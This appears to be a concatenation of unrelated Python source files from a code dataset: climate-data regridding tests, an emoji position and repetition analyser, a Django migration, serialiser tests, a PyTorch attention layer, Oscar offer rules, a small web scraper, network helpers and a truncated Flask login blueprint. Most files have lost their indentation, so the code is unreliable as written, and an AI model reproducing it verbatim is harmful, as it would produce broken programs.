self.cmap = bm(llcrnrlat = lllat, llcrnrlon = lllon,
urcrnrlat = urlat, urcrnrlon = urlon,
resolution = 'i', projection = 'cyl')
lllat = self.tas.getLatitude()[:].min()
urlat = self.tas.getLatitude()[:].max()
lllon = self.tas.getLongitude()[:].min()
urlon = self.tas.getLongitude()[:].max()
self.tmap = bm(llcrnrlat = lllat, llcrnrlon = lllon,
urcrnrlat = urlat, urcrnrlon = urlon,
resolution = 'i', projection = 'cyl')
def test_test1(self):
"""
2D
"""
tas = cdms2.open(cdat_info.get_sampledata_path() + \
'/tas_ccsr-95a_1979.01-1979.12.nc')('tas')[0, 0,...]
tasInterp = tas.regrid( tas.getGrid() )
        print(numpy.all(tasInterp.mask))
if not numpy.all(tasInterp.mask):
n = reduce(lambda x,y: x*y, tasInterp.shape)
diff = abs(numpy.sum(tas - tasInterp))/float(n)
self.assertLess(diff, 3.e-5)
def test_test2(self):
"""
2D + time
"""
tas = cdms2.open(cdat_info.get_sampledata_path() + \
'/tas_ccsr-95a_1979.01-1979.12.nc')('tas')[:, 0,...]
tasInterp = tas.regrid( tas.getGrid() )
if not numpy.all(tasInterp.mask):
n = reduce(lambda x,y: x*y, tasInterp.shape)
diff = abs(numpy.sum(tas - tasInterp))/float(n)
self.assertLess(diff, 3.e-5)
def test_test3(self):
"""
2D + level
"""
tas = cdms2.open(cdat_info.get_sampledata_path() + \
'/tas_ccsr-95a_1979.01-1979.12.nc')('tas')[0, :,...]
tasInterp = tas.regrid( tas.getGrid() )
if not numpy.all(tasInterp.mask):
n = reduce(lambda x,y: x*y, tasInterp.shape)
diff = abs(numpy.sum(tas - tasInterp))/float(n)
self.assertLess(diff, 3.e-5)
def test_test4(self):
"""
2D + level + time
"""
tas = cdms2.open(cdat_info.get_sampledata_path() + \
'/tas_ccsr-95a_1979.01-1979.12.nc')('tas')[:, :,...]
tasInterp = tas.regrid( tas.getGrid() )
if not numpy.all(tasInterp.mask):
tasInterp[0,0,...]
n = reduce(lambda x,y: x*y, tasInterp.shape)
diff = abs(numpy.sum(tas - tasInterp))/float(n)
self.assertLess(diff, 3.e-5)
def Xtest_test5(self):
tasInterp = self.tas.regrid(self.clt.getGrid())
cltInterp = self.clt.regrid(self.tas.getGrid())
tasIntCyc = self.tas.regrid(self.clt.getGrid(), mkCyclic = True)
cltIntCyc = self.clt.regrid(self.tas.getGrid(), mkCyclic = True)
if PLOT:
fig = pl.figure(1)
fig.add_subplot(2,2,1)
self.cmap.pcolor(self.tas.getLongitude()[:], self.tas.getLatitude()[:],
cltInterp, vmin = 0, vmax = 100)
self.cmap.colorbar()
self.cmap.drawcoastlines()
pl.title("clt Interp")
fig = pl.figure(1)
fig.add_subplot(2,2,2)
self.cmap.pcolor(self.tas.getLongitude()[:], self.tas.getLatitude()[:],
cltIntCyc, vmin = 0, vmax = 100)
self.cmap.colorbar()
self.cmap.drawcoastlines()
pl.title("clt Interp Cyclic")
fig.add_subplot(2,2,3)
self.tmap.pcolor(self.clt.getLongitude()[:], self.clt.getLatitude()[:],
tasInterp, vmin = 250, vmax = 300)
self.tmap.colorbar()
self.tmap.drawcoastlines()
pl.title("tas Interp")
fig.add_subplot(2,2,4)
self.tmap.pcolor(self.clt.getLongitude()[:], self.clt.getLatitude()[:],
tasIntCyc, vmin = 250, vmax = 300)
self.tmap.colorbar()
self.tmap.drawcoastlines()
pl.title("tas Interp Cyclic")
if __name__ == '__main__':
print "" # Spacer
suite = unittest.TestLoader().loadTestsFromTestCase(TestTasRegrid)
unittest.TextTestRunner(verbosity = 1).run(suite)
if PLOT: pl.show()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# EVAPOR workflow, written in Python 3.6 in April 2020 by mswartz2@gmu.edu
# This code imports a text string, extracts the emojis as a list, and
# reports the unique emojis and the unique emoji attributes for the text.
# It then analyzes the structure of the content, drills into the emojis to
# report their relative position, and finally reports the emoji vector of
# attributes, position, order, and repetition of emoji use within the text:
#   text, emoji list, unique emojis and attributes, relative position of emoji,
#   per span of emojis/attributes flipped or not, repetition within a single
#   span, repetition across spans.
# dependencies
import json
import re  # part of the Python standard library
import regex
import ast
# included in this repo
import extractEmojis
import getEmojiAttributes
#import identifyStructure
# get the emoji spans as attributes
def getAttributesForSpansList(list_of_lists_of_vals, attribute):
attributes_to_choose_from = ['rownum', 'emoji', 'cldr short name', 'codepoint', 'status' , 'char_len', 'version', \
'desc', 'person_animal_other', 'anthro_type','gender', 'skin_tone', 'sentiment_smileys_binary',\
'shape_type', 'shape_color', 'direction','group', 'subgroup', 'grp_subgrp']
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
if attribute in attributes_to_choose_from:
attribute_spans_list = []
for sublist in list_of_lists_of_vals:
attribute_sublist = getEmojiAttributes.getListOfSingleAttributeValuesForEmojiList(sublist, attribute)
attribute_spans_list.append(attribute_sublist)
return attribute_spans_list
else:
return []
else:
return []
# get the relative position
## ANALYZE EMOJI SPANS
## GET RELATIVE POSITION
# sample text: RT @atmention: @person2 12 🗳🇦🇺😃 yes ll smiles #yes #happiness @my_day 🟠🍎http://www.happiness.wwwwww
# GET RELATIVE POSITION
content_type_of_interest = 'emoji'
def getRelativePositionOfContentType(fullDocumentStructureWithContent, content_type_of_interest):
# input: fullDocumentStructureWithContent = [('RT', 1, ['RT']), ('at_mention', 2, ['@atmention', '@person2']), ('text', 2, ['12', ' ']), ('emoji', 3, ['🗳', '🇦🇺', '😃']), ('text', 6, ['yes', ' ', 'll', ' ', 'smiles', ' ']), ('hashtag', 2, ['#yes', '#happiness']), ('at_mention', 1, ['@my_day']), ('emoji', 2, ['\U0001f7e0', '🍎']), ('url', 1, ['http://www.happiness.wwwwww'])]
    # code: emoji_positions = getRelativePositionOfContentType(fullDocumentStructureWithContent, 'emoji')
# output: ['middle', 'end']
    # outputs are beginning, middle, end # these are relative, but the structure list can be used for more details
# NOTES: can also put in 'at_mention' or 'url' etc to see where they are
span_list = []
if content_type_of_interest not in ['RT','at_mention','emoji','url','text','punctuation']:
return []
if type(fullDocumentStructureWithContent) != list:
new_fullDocumentStructureWithContent = ast.literal_eval(fullDocumentStructureWithContent)
if (len(new_fullDocumentStructureWithContent)>0) and (type(new_fullDocumentStructureWithContent[0])==tuple):
span_list = new_fullDocumentStructureWithContent
else:
return []
else:
span_list = fullDocumentStructureWithContent
try:
index_span_pos_list = [ i for i in range(len(span_list)) if span_list[i][0] == content_type_of_interest]
pos_list = []
num_spans = len(span_list)
structure_cnts = [0,0,0,0,0]# span counts
relative_pos_list = [0,0,0,0,0]
relative_pos_list_descrip = []
cnt_spans = 0
index_span_pos_list_relative = [[],[],[],[],[]]
pos_list_w_values = [[],[],[],[],[]]
pos_list_w_value_cnts = [[],[],[],[],[]]
pos_list_w_total = [0,0,0,0,0]
if 0 in index_span_pos_list:
relative_pos_list_descrip.append('start')
structure_cnts[0]=1
relative_pos_list[0]=1
pos_list_w_values[0]=[tuple(span_list[0][2])]
pos_list_w_value_cnts[0] = [span_list[0][1]]
pos_list_w_total[0] = span_list[0][1]
index_span_pos_list_relative[0]= [0]
if num_spans > 1:
if len(span_list)-1 in index_span_pos_list:
relative_pos_list_descrip.append('final')
structure_cnts[4]=1
relative_pos_list[4]=1
pos_list_w_values[4]=[tuple(span_list[-1][2])]
pos_list_w_value_cnts[4] = [span_list[-1][1]]
pos_list_w_total[4] = span_list[-1][1]
index_span_pos_list_relative[4]= [len(span_list)-1]
if num_spans == 3:
# middle = 1
if 1 in index_span_pos_list:
relative_pos_list_descrip.append('middle')
relative_pos_list[2]=1
structure_cnts[2] = 1# mid
pos_list_w_values[2]=[tuple(span_list[1][2])]
pos_list_w_value_cnts[2] = [span_list[1][1]]
pos_list_w_total[2] = span_list[1][1]
index_span_pos_list_relative[2]= [1]
if num_spans == 4 : # 4 has no middle
if 1 in index_span_pos_list:
relative_pos_list_descrip.append('beginning')
relative_pos_list[1]=1
structure_cnts[1] = 1#
pos_list_w_values[1]=[tuple(span_list[1][2])]
pos_list_w_value_cnts[1] = [span_list[1][1]]
pos_list_w_total[1] = span_list[1][1]
index_span_pos_list_relative[1]= [1]
if 2 in index_span_pos_list:
relative_pos_list_descrip.append('end')
relative_pos_list[3]=1
structure_cnts[3] = 1#
pos_list_w_values[3]=[tuple(span_list[2][2])]
pos_list_w_value_cnts[3] = [span_list[2][1]]
pos_list_w_total[3] = span_list[2][1]
index_span_pos_list_relative[3]= [2]
if num_spans == 5 :# if 5 if has a middle if a 3
if 1 in index_span_pos_list:
relative_pos_list_descrip.append('beginning')
relative_pos_list[1]=1
structure_cnts[1] = 1#
pos_list_w_values[1]=[tuple(span_list[1][2])]
pos_list_w_value_cnts[1] = [span_list[1][1]]
pos_list_w_total[1] = span_list[1][1]
index_span_pos_list_relative[1]= [1]
if 2 in index_span_pos_list:
relative_pos_list_descrip.append('middle')
relative_pos_list[2]=1
structure_cnts[2] = 1# mid
#print('middle small cnt = ', structure_cnts[2])
pos_list_w_values[2]=[tuple(span_list[2][2])]
pos_list_w_value_cnts[2] = [span_list[2][1]]
pos_list_w_total[2] = span_list[2][1]
index_span_pos_list_relative[2]= [2]
if 3 in index_span_pos_list:
relative_pos_list_descrip.append('end')
relative_pos_list[3]=1
structure_cnts[3] = 1#
pos_list_w_values[3]=[tuple(span_list[3][2])]
pos_list_w_value_cnts[3] = [span_list[3][1]]
pos_list_w_total[3] = span_list[3][1]
index_span_pos_list_relative[3]= [3]
        # if 5 or more then add in beginning or end, based on the size of the span list
if num_spans > 5:
third = int(num_spans/3)
beginning_indices = [i for i in range(third)]
end_indices = [num_spans - beginning_indices[v] for v in reversed(beginning_indices)]
#middle_indices = [i for i in range(beginning_indices[-1]+1,end_indices[0])]
middle_indices = [i for i in range(beginning_indices[-1]+1,end_indices[0]-1)]
end_indices = [end_indices[0]-1] + end_indices # for handling even numbers
def intersection_list(lst1, lst2):
lst3 = [value for value in lst1 if value in lst2]
return lst3
# indices w values of interest
beg_indices_w_val_of_interest = intersection_list(index_span_pos_list,beginning_indices)# beg
mid_indices_w_val_of_interest = intersection_list(index_span_pos_list,middle_indices)# mid
end_indices_w_val_of_interest = intersection_list(index_span_pos_list,end_indices)# end
# so no dupes with first and last if they exist
if 0 in index_span_pos_list:
beg_indices_w_val_of_interest = beg_indices_w_val_of_interest[1:]
if len(span_list)-1 in index_span_pos_list:
end_indices_w_val_of_interest = end_indices_w_val_of_interest[:-1]
# append counts
structure_cnts[1] = len(beg_indices_w_val_of_interest)# beg
structure_cnts[2] = len(mid_indices_w_val_of_interest)# mid
structure_cnts[3] = len(end_indices_w_val_of_interest)# end
if structure_cnts[1]>0:
relative_pos_list_descrip.append('beginning')
relative_pos_list[1]=1
pos_list_w_values[1]=[tuple(span_list[i][2]) for i in beg_indices_w_val_of_interest]
pos_list_w_value_cnts[1] = [span_list[i][1] for i in beg_indices_w_val_of_interest]
pos_list_w_total[1] = sum([span_list[i][1] for i in beg_indices_w_val_of_interest])
index_span_pos_list_relative[1]= beg_indices_w_val_of_interest
if structure_cnts[2]>0:
relative_pos_list_descrip.append('middle')
relative_pos_list[2]=1
pos_list_w_values[2]=[tuple(span_list[i][2]) for i in mid_indices_w_val_of_interest]
pos_list_w_value_cnts[2] = [span_list[i][1] for i in mid_indices_w_val_of_interest]
pos_list_w_total[2] = sum([span_list[i][1] for i in mid_indices_w_val_of_interest])
index_span_pos_list_relative[2]= mid_indices_w_val_of_interest
if structure_cnts[3]>0:
relative_pos_list_descrip.append('end')
relative_pos_list[3]=1
pos_list_w_values[3]=[tuple(span_list[i][2]) for i in end_indices_w_val_of_interest]
pos_list_w_value_cnts[3] = [span_list[i][1] for i in end_indices_w_val_of_interest]
pos_list_w_total[3] = sum([span_list[i][1] for i in end_indices_w_val_of_interest])
index_span_pos_list_relative[3]= end_indices_w_val_of_interest
cnt_spans = len(index_span_pos_list)
#return [cnt_spans, index_span_pos_list, index_span_pos_list_relative,\
# relative_pos_list,relative_pos_list_descrip, structure_cnts,\
# pos_list_w_values, pos_list_w_value_cnts, pos_list_w_total]
# move final to the end
if 'final' in relative_pos_list_descrip:
relative_pos_list_descrip.remove('final')
relative_pos_list_descrip +=['final']
return relative_pos_list_descrip
except:
return []
# get the order
# get the repetition
## ANALYZE REPETITION WITHIN SPAN
# check for repetition within each span
def labelRepetitionWithinSpans(list_of_vals_in_spans):
# input: emojis_as_list_in_spans_list = [['💙️'],['💙️','💙️','💙️'],['😃']]
    # code: within_span_repetition_list = labelRepetitionWithinSpans(emojis_as_list_in_spans_list)
# output: ['single_within','all_identical_within','single_within']
repetition_within_spans_status_list = []
if list_of_vals_in_spans == []:
return repetition_within_spans_status_list
for val_span_list in list_of_vals_in_spans:
if len(val_span_list) == 1:
repetition_within_spans_status_list.append('single_within')
else: # more than one val
val_set = set(val_span_list)
if len(val_set) == 1:
repetition_within_spans_status_list.append('all_identical_within') # amplification
elif len(val_set) < len(val_span_list):# some repetition
repetition_within_spans_status_list.append('some_identical_within') # list which are identical?
else:# if len(val_set) = len(val_span_list) # no repetition all unique
repetition_within_spans_status_list.append('no_repetition_within')
return repetition_within_spans_status_list
def getValuesRepeatedWithinSpans(list_of_lists_of_vals):
# input: emojis_as_list_in_spans_list = [['💙️'],['💙️','💙️','💙️'],['😃']]
# code: vals_repeated_within_span = getValuesRepeatedWithinSpans(emojis_as_list_in_spans_list)
# value repeated, span number, number of times repeated
# output: [('💙️',1,3)]
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
list_w_vals_repeated_within = []
i=0
for span in list_of_lists_of_vals:
if len(span)>1:
uniques_in_span = list(set(span))
if len(uniques_in_span) != len(span):
for uni in uniques_in_span:
cnt = span.count(uni)
if cnt >1:
tup = (uni,i,span.count(uni))
list_w_vals_repeated_within.append(tup)
i+=1
return list_w_vals_repeated_within
else:
return []
## ANALYZE REPETITION ACROSS SPANS
# function to get cnt of spans value found in
def getCntSpansPerValue(list_of_lists_of_vals):
# input: emojis_as_list_in_spans_list = [['💙️'],['💙️','💙️','💙️'],['😃']]
    # code: list_of_vals_w_cnts_of_span = getCntSpansPerValue(emojis_as_list_in_spans_list)
# output: [('💙️',2),('😃',1)]
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
list_of_val_cnt_tuples = []
long_list_on_uni_vals_per_list = []
if list_of_lists_of_vals == []:
return list_of_val_cnt_tuples
# make sure it is a list of list of uniques
list_of_unique_vals_in_list = [sorted(list(set(list_of_vals))) for list_of_vals in list_of_lists_of_vals]
# convert list of lists to long list
for uni_vals in list_of_unique_vals_in_list:
long_list_on_uni_vals_per_list += uni_vals
# get unique emojis
uni_vals_list = list(set(long_list_on_uni_vals_per_list))
for uni_val in uni_vals_list:
if long_list_on_uni_vals_per_list.count(uni_val)>1:
list_of_val_cnt_tuples.append((uni_val, long_list_on_uni_vals_per_list.count(uni_val)))
        # for consistency and comparison, sort the list of cnts by val ascending, then by cnt descending
        # sort the list of val cnts in ascending order by emoji (first item in tuple)
descending_sort_list_of_cnts_by_val = sorted(list_of_val_cnt_tuples, key = lambda x: x[0])
# sort the list of val cnts in descending order by cnt (second item in tuple)
descending_sort_list_of_cnts = sorted(descending_sort_list_of_cnts_by_val, key = lambda x: x[1], reverse=True)
return descending_sort_list_of_cnts
else:
return []
# STATUS OF REPETITION ACROSS SPANS
# check if any spans are in common
def getLabelForRepetitionAcrossSpans(list_of_lists_of_vals):
# e.g. input: [['💙️', '🙏','😀','🔴'], ['💙️', '🙏'], ['💙️','🟢'], ['😀']] ==> output: 'no_repetition_of_list_of_vals'
# input: list_of_emojis_in_spans = [['💙️', '🙏'], ['💙️', '🙏'], ['💙️'], ['😀']]
    # code: repetition_status_across_spans = getLabelForRepetitionAcrossSpans(list_of_emojis_in_spans)
# output: 'some_repetition_of_list_vals'
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
if list_of_lists_of_vals == []:
return []
list_of_uni_val_lists_as_strs = []
for val_list in list_of_lists_of_vals:
list_of_uni_val_lists_as_strs.append(str(val_list))
if len(list_of_lists_of_vals) == 1:
return "single_list"
elif len(list_of_lists_of_vals)>1 and len(set(list_of_uni_val_lists_as_strs))==1:
return "repetition_across_spans"
elif len(list_of_lists_of_vals)>1 and (len(list_of_lists_of_vals) == len(set(list_of_uni_val_lists_as_strs))):
return "no_repetition_across_spans"
elif len(list_of_lists_of_vals)>1 and len(set(list_of_uni_val_lists_as_strs))>1:
return "some_repetition_across_spans"
else:
return "unknown"
else:
return "no_repetition_across_spans"
# VALUES THAT ARE REPETITION ACROSS SPANS AND ORDER
# get the spans that are in common with other span parts (repetition with same order)
def getSpansInOtherSpansPlusCount(list_of_lists_of_vals):
# input: list_of_emojis_in_spans = [['💙️', '🙏'], ['💙️', '🙏','🔴'], ['💙️'], ['😀']]
    # code: list_of_vals_in_common = getSpansInOtherSpansPlusCount(list_of_emojis_in_spans)
# output: [("'💙️'", 3), ("'💙️', '🙏'", 2)]
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
list_of_lists_of_vals_as_strs = [str(val_list) for val_list in list_of_lists_of_vals]
list_of_tuple_cnts_of_spans_in_other_spans = []
for i in range(len(list_of_lists_of_vals)):
val_list_as_str_to_check = list_of_lists_of_vals_as_strs[i][1:-1]
cnt_how_many_times_val_list_in_other_lists = 1
for z in range(len(list_of_lists_of_vals_as_strs)):
if i == z:
continue
else:
val_list_str = list_of_lists_of_vals_as_strs[z]
if val_list_as_str_to_check in val_list_str:
#print('true', val_list_as_str_to_check, val_list_str)
cnt_how_many_times_val_list_in_other_lists += 1
list_of_tuple_cnts_of_spans_in_other_spans.append((val_list_as_str_to_check.replace("'","").replace(', ','').replace('"',''),cnt_how_many_times_val_list_in_other_lists))
uni_tup_cnts_list = list(set(list_of_tuple_cnts_of_spans_in_other_spans))
uni_tup_cnts_list_greater_than_1 = filter(lambda x: x[1] > 1, uni_tup_cnts_list)
return sorted(uni_tup_cnts_list_greater_than_1, key = lambda x: x[1], reverse=True)
else:
return []
## ANALYZE ORDER AND SYMMETRY ACROSS SPANS CHECK FOR IDENTICAL OR FLIPPED
#import ast
# check the spans that are identical uniques for flipped order
def checkIdenticalOrFlippedSpans(list_of_lists_of_vals):
# input: list_of_emojis_in_spans = [['💙️','🙏'], ['🙏','💙️'], ['💙️','🙏'], ['😀'],['😀']]
    # code: symmetry_check = checkIdenticalOrFlippedSpans(list_of_emojis_in_spans)
# output: [('identical_spans', ([0, 2], ['💙️', '🙏'])),
#('identical_spans', ([3, 4], ['😀'])),
#('flipped_spans', ([0, 2], [1], [['💙️', '🙏'], ['🙏', '💙️']]))]
# NOTES
# the numbers indicate the index position of the span in the input list
# for flipped, spans at [0,2] both have the value ['💙️', '🙏']
# and the span at position [1] contains the flipped version which is ['🙏', '💙️']
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
list_of_lists_of_vals_as_strs = [str(val_list) for val_list in list_of_lists_of_vals]
uni_list_of_val_lists_as_strs = list(set(list_of_lists_of_vals_as_strs))
list_of_tuple_symmetry_spans = []
list_of_identical_spans = []
list_of_flipped_spans = []
for uni_val_list_str in uni_list_of_val_lists_as_strs:
flipped_val_list_as_str_to_check = str(list(reversed(ast.literal_eval(uni_val_list_str))))
val_list_w_identicals = []
val_list_w_flipped = []
for z in range(len(list_of_lists_of_vals_as_strs)):
val_list_str_to_compare = list_of_lists_of_vals_as_strs[z]
if uni_val_list_str == val_list_str_to_compare:
val_list_w_identicals.append(z)
if uni_val_list_str.count(',')> 0: # if more than one val then check for flipped
if flipped_val_list_as_str_to_check == val_list_str_to_compare:
val_list_w_flipped.append(z)
if len(val_list_w_identicals) > 1:
list_of_tuple_symmetry_spans.append(('identical_spans', (val_list_w_identicals, list_of_lists_of_vals[val_list_w_identicals[0]])))
if len(val_list_w_flipped) > 0:
if min(val_list_w_identicals) < min(val_list_w_flipped):
list_of_tuple_symmetry_spans.append(('flipped_spans', (val_list_w_identicals, val_list_w_flipped, [list_of_lists_of_vals[val_list_w_identicals[0]],list_of_lists_of_vals[val_list_w_flipped[0]]])))
# for flipped spans if the second is smaller than first then drop
if list_of_tuple_symmetry_spans == []:
return [('no_identical_or_flipped_spans',)]
return sorted(list_of_tuple_symmetry_spans, key = lambda x: x[0], reverse=True)
else:
return []
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.13 on 2021-08-09 08:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('projects', '0118_auto_20210809_1032'),
]
operations = [
migrations.AlterField(
model_name='reportcolumnpostfix',
name='phases',
field=models.ManyToManyField(related_name='report_columns', to='projects.CommonProjectPhase', verbose_name='phases'),
),
]
|
nilq/baby-python
|
python
|
"""
Serialiser tests
"""
from datetime import datetime
import unittest
from zorp.serialiser import Serialiser
class TestSerialiser(unittest.TestCase):
"""
Test the serialiser
"""
def __test_encode_decode(self, expected):
"""
Test that encoding and decoding a value
results in the original value
"""
actual = Serialiser.decode(Serialiser.encode(expected))
self.assertEqual(expected, actual)
def test_string(self):
"""
Test encoding/decoding a string
"""
self.__test_encode_decode("This is a string")
def test_datetime(self):
"""
Test encoding/decoding a datetime
"""
self.__test_encode_decode(datetime(1970, 1, 2))
def test_empty_list(self):
"""
Test encoding/decoding an empty list
"""
self.__test_encode_decode([])
def test_list(self):
"""
Test encoding/decoding a list
"""
self.__test_encode_decode([1, "two"])
def test_empty_dict(self):
"""
Test encoding/decoding an empty dict
"""
self.__test_encode_decode({})
def test_dict(self):
"""
        Test encoding/decoding a dict
"""
self.__test_encode_decode({"one": 1, "two": 2})
|
nilq/baby-python
|
python
|
import torch
import torch.utils.data as data_utils
from torch.utils.data import DataLoader
import torch.autograd as autograd
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn.parameter import Parameter
from allennlp.modules.attention import BilinearAttention, DotProductAttention
from allennlp.nn.util import weighted_sum
from allennlp.nn.util import masked_softmax
from allennlp.modules import FeedForward
import logging
import numpy as np
import joblib
import os
from layers.activation import get_activation
class Attention(nn.Module):
'''
Single-task attention
'''
def __init__(self, input_dim, dropout=0.0, use_ffnn=True, query_dim=None,
activation='tanh'):
        super(Attention, self).__init__()
        self.use_ffnn = use_ffnn
        # store the configuration so forward(verbose=True) can report it
        self.input_dim = input_dim
        self.query_dim = query_dim if use_ffnn else input_dim
        self.activation = activation
        self.dropout = dropout
if self.use_ffnn:
self.ffnn = FeedForward( \
input_dim = input_dim,
num_layers = 1,
hidden_dims = query_dim,
activations = get_activation(activation),
dropout = 0)
else:
query_dim = input_dim
# Dot product attention
self.attention = DotProductAttention(normalize=True)
# Event-specific attention vector
# (input_dim)
self.vector = Parameter(torch.Tensor(query_dim))
torch.nn.init.normal_(self.vector)
# Dropout
self.drop_layer = nn.Dropout(p=dropout)
def forward(self, X, mask=None, verbose=False):
'''
Generate predictions
Parameters
----------
X: input with shape (batch_size, max_seq_len, input_dim)
mask: input with shape (batch_size, max_seq_len)
'''
# Batch size
batch_size = X.shape[0]
# Batch vector (repeat across first dimension)
vector = self.vector.unsqueeze(0).repeat(batch_size, 1)
#
if self.use_ffnn:
Q = self.ffnn(X)
else:
Q = X
# Attention weights
# shape: (batch_size, max_seq_len)
alphas = self.attention( \
vector = vector,
matrix = Q,
matrix_mask = mask)
# Attended input
# shape: (batch_size, encoder_query_dim)
output = weighted_sum(X, alphas)
# Dropout layer
output = self.drop_layer(output)
        if verbose:
            # log the stored configuration (the bare names used previously
            # were undefined inside forward and raised a NameError)
            logging.info('Attention')
            logging.info('\tinput_dim: {}'.format(self.input_dim))
            logging.info('\tquery_dim: {}'.format(self.query_dim))
            logging.info('\tactivation: {}'.format(self.activation))
            logging.info('\tdropout: {}'.format(self.dropout))
            logging.info('\tuse_ffnn: {}'.format(self.use_ffnn))
return (output, alphas)
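# A minimal usage sketch with random tensors (shapes are illustrative):
#
#     att = Attention(input_dim=64, query_dim=32)
#     X = torch.randn(8, 20, 64)        # (batch, max_seq_len, input_dim)
#     mask = torch.ones(8, 20)          # all positions valid
#     out, alphas = att(X, mask=mask)   # out: (8, 64), alphas: (8, 20)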
|
nilq/baby-python
|
python
|
from oscar.apps.offer import models
class AlphabetRange(object):
name = "Products that start with D"
def contains_product(self, product):
return product.title.startswith('D')
def num_products(self):
return None
class BasketOwnerCalledBarry(models.Condition):
name = "User must be called barry"
class Meta:
proxy = True
def is_satisfied(self, basket):
if not basket.owner:
return False
return basket.owner.first_name.lower() == 'barry'
def can_apply_condition(self, product):
return False
def consume_items(self, basket, affected_lines):
return
|
nilq/baby-python
|
python
|
# Generated by Django 2.1.7 on 2019-04-09 14:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('home', '0044_auto_20190409_1448'),
]
operations = [
migrations.RemoveField(
model_name='badgespage',
name='genericpage_ptr',
),
migrations.AddField(
model_name='badgespage',
name='resourcepage_ptr',
field=models.OneToOneField(auto_created=True, default=None, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='home.ResourcePage'),
preserve_default=False,
),
]
|
nilq/baby-python
|
python
|
import requests
from bs4 import BeautifulSoup
blacklist = {
"farms",
"csa",
"farmers-markets",
"restaurants",
"food-coops",
"u-pick",
"farm-stands",
"others",
"list"}
city = '/locations/'
wiki = f"https://www.localharvest.org/{city}"
page = requests.get(wiki)
soup = BeautifulSoup(page.text, "html.parser")
for link in soup.find_all('a'):
    href = link.get('href')
    # guard against anchors without an href, then match the /locations/ prefix
    if href and href.startswith(city) and href[len(city):] not in blacklist:
        print(href[len(city):])
|
nilq/baby-python
|
python
|
"""Common functions."""
import re
from socket import getaddrinfo, AF_INET, AF_INET6, IPPROTO_TCP
from datetime import timedelta
def explode_datetime(datetime_str):
    """Extract days, hours, and minutes from a datetime string.
    Example: "1d 3h 2m" returns timedelta(days=1, hours=3, minutes=2)
    Keyword arguments:
    datetime_str -- date time in string
    """
    base_regex = "([0-9]+){pattern}"
    def extract_timeunit(pattern):
        try:
            # re.search finds the unit anywhere; ([0-9]+) captures multi-digit values
            result = int(re.search(base_regex.format(pattern=pattern), datetime_str)[1])
        except (ValueError, TypeError):
            result = 0
        return result
days = extract_timeunit("d")
hours = extract_timeunit("h")
minutes = extract_timeunit("m")
return timedelta(days=days, hours=hours, minutes=minutes)
def resolve_hostname(hostname, address_family):
"""Convert hostname to IP.
Keyword arguments:
hostname -- hostname to resolve
address_family -- preferred address family for resolution
"""
af_string_to_attribute = {"ipv4": AF_INET, "ipv6": AF_INET6}
try:
family = af_string_to_attribute[address_family]
except KeyError:
raise ValueError("unknown address family")
try:
ip_addr = getaddrinfo(hostname, None, family=family, proto=IPPROTO_TCP)[0][4][0]
return ip_addr
except Exception:
return
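# Usage sketch for the helpers above (the hostname is a placeholder):
#
#     explode_datetime("1d 3h 2m")             # -> timedelta(days=1, hours=3, minutes=2)
#     resolve_hostname("example.com", "ipv4")  # -> an IPv4 string, or None on failure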
|
nilq/baby-python
|
python
|
from flask import Blueprint, request, render_template, flash, g, session, redirect, url_for, current_app, json
from flask_login import login_user, login_required, logout_user  # flask.ext.* imports were removed in Flask 1.0
from app.users.models import Users
from app.users.forms import LoginForm, RegisterForm, UserForm, PasswordForm, ResetPassForm, NewPassForm
from app.users.decorators import admin_required
from app.services.mail import send_email
from app.services.ajax import getnewmessages
import datetime
mod = Blueprint('users',__name__)
@mod.before_app_request
def load_session_data():
if 'user_id' in session.keys():
g.user = Users.objects(id=session['user_id']).get()
session.inbox = getnewmessages(g.user.id)
@mod.before_request
def load_menu_data():
session.activemenu = 'Membri'
@mod.route('/login', methods=['GET','POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
try:
user = Users.objects(email=form.email.data).get()
if user.verify_password(form.password.data):
login_user(user,form.remember_me.data)
return redirect(request.args.get('next') or url_for('wall.list'))
else:
raise Exception('Not authorised')
except Exception as err:
flash('Invalid username or password!', category='alert-danger')
return render_template('users/login.html', pagetitle='Login',form=form,login=True)
@mod.route('/logout', methods=['GET'])
def logout():
logout_user()
return redirect('/login')
@mod.route('/inregistrare', methods=['GET','POST'])
def registeruser():
""" Build the view used to add new accounts """
form = RegisterForm()
if form.validate_on_submit():
try:
